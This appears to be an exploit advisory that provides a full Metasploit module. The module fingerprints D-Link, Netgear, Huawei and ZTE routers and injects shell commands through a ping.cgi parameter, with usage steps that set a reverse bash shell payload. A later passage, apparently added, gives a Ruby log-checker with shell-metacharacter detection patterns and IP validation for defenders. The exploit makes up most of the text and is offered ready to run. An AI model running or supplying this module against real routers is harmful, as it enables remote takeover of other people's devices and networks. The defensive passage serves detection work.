=============================================================================================================================================
| # Title : IoT Router Auto Fingerprint Command Injection Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : indoushka |
=============================================================================================================================================
[+] Summary : This Metasploit module targets multiple IoT routers by automatically fingerprinting the device vendor and attempting to exploit command injection vulnerabilities.
The module sends an HTTP request to identify the router manufacturer by analyzing response headers and page content. Once the vendor is detected (such as D-Link, Netgear, Huawei, or ZTE),
it dynamically selects an appropriate command injection payload format tailored to the specific firmware behavior. The exploit then delivers the payload through a vulnerable CGI endpoint (ping.cgi),
enabling remote command execution on Linux-based router systems.
The module is designed for automated exploitation across different router brands using a single adaptive attack workflow.
[+] POC : modules/exploits/linux/http/iot_indoushka_rce.rb
msfconsole
reload_all
use exploit/linux/http/iot_indoushka_rce
set RHOSTS TARGET_IP
set RPORT 80
set LHOST YOUR_IP
set payload cmd/unix/reverse_bash
run
##
# IoT Multi Router Auto Fingerprint RCE
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'IoT Router Auto Fingerprint Command Injection',
      'Description' => %q{
        This module attempts to fingerprint router vendors automatically
        and trigger command injection vulnerabilities in several IoT routers.
      },
      'Author' =>
        [
          'indoushka'
        ],
      'License' => MSF_LICENSE,
      'Platform' => ['linux'],
      'Arch' => ARCH_CMD,
      'Targets' =>
        [
          ['Automatic', {}]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2025-01-01'))
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'Base path', '/'])
      ])
  end

  def fingerprint
    res = send_request_cgi({
      'uri' => '/'
    })
    return "Unknown" if res.nil?
    body = res.body.downcase
    headers = res.headers.to_s.downcase
    if body.include?("d-link") || headers.include?("d-link")
      return "D-Link"
    end
    if body.include?("netgear") || headers.include?("netgear")
      return "Netgear"
    end
    if body.include?("huawei") || headers.include?("huawei")
      return "Huawei"
    end
    if body.include?("zte") || headers.include?("zte")
      return "ZTE"
    end
    return "Unknown"
  end

  def payload_for(vendor)
    case vendor
    when "D-Link"
      return ";#{payload.encoded}"
    when "Netgear"
      return "`#{payload.encoded}`"
    when "Huawei"
      return "|#{payload.encoded}"
    when "ZTE"
      return ";#{payload.encoded}"
    else
      return ";#{payload.encoded}"
    end
  end

  def exploit
    print_status("Fingerprinting router...")
    vendor = fingerprint
    print_good("Detected Vendor: #{vendor}")
    cmd = payload_for(vendor)
    print_status("Sending payload...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "cgi-bin", "ping.cgi"),
      'vars_get' =>
        {
          'ip' => cmd
        }
    })
    print_good("Payload sent")
  end
end
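For defenders, the request this module sends has a fixed shape: a GET to cgi-bin/ping.cgi whose ip parameter is not an IP address. The following is an added example, not part of the module or the original advisory: a log check that flags such requests, plus the allowlist validation a ping handler should apply. The function names and the log lines are constructed for illustration.

```ruby
require 'uri'
require 'ipaddr'

# Metacharacters reported in findings; payload_for above uses ; ` and |.
SHELL_META = /[;`|&$()<>]/

# Allowlist check a ping handler should enforce: a literal IPv4/IPv6 address only.
def valid_ping_target?(value)
  return false unless value.match?(/\A[0-9A-Fa-f:.]{2,45}\z/)
  IPAddr.new(value)
  true
rescue IPAddr::Error
  false
end

# Inspect one access-log line; return a finding hash, or nil if it is benign.
def inspect_line(line)
  m = line.match(%r{"(?:GET|POST) (\S+) HTTP/})
  return nil unless m
  path, query = m[1].split('?', 2)
  return nil unless query && path.end_with?('/cgi-bin/ping.cgi')
  ip = begin
    URI.decode_www_form(query).to_h['ip']
  rescue ArgumentError
    query # malformed %-encoding: keep the raw query so the line is still flagged
  end
  return nil if ip.nil? || valid_ping_target?(ip)
  { src: line[/\A\S+/], value: ip, meta: ip.scan(SHELL_META).uniq }
end

def findings(log)
  log.each_line.map { |l| inspect_line(l) }.compact
end

# Constructed sample log (documentation addresses, placeholder command "CMD").
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /cgi-bin/ping.cgi?ip=192.168.1.1 HTTP/1.1" 200 312
  198.51.100.7 - - [01/Jan/2025:10:00:05 +0000] "GET /cgi-bin/ping.cgi?ip=%3BCMD HTTP/1.1" 200 0
  198.51.100.7 - - [01/Jan/2025:10:00:06 +0000] "GET /cgi-bin/ping.cgi?ip=%60CMD%60 HTTP/1.1" 200 0
  198.51.100.7 - - [01/Jan/2025:10:00:07 +0000] "GET /cgi-bin/ping.cgi?ip=%7CCMD HTTP/1.1" 200 0
  192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024
LOG

if __FILE__ == $0
  findings(SAMPLE_LOG).each { |f| puts "#{f[:src]} ip=#{f[:value].inspect} meta=#{f[:meta].join}" }
end
```

The same valid_ping_target? check belongs in the CGI handler itself, so that the value is rejected before it is ever placed on a command line.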
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================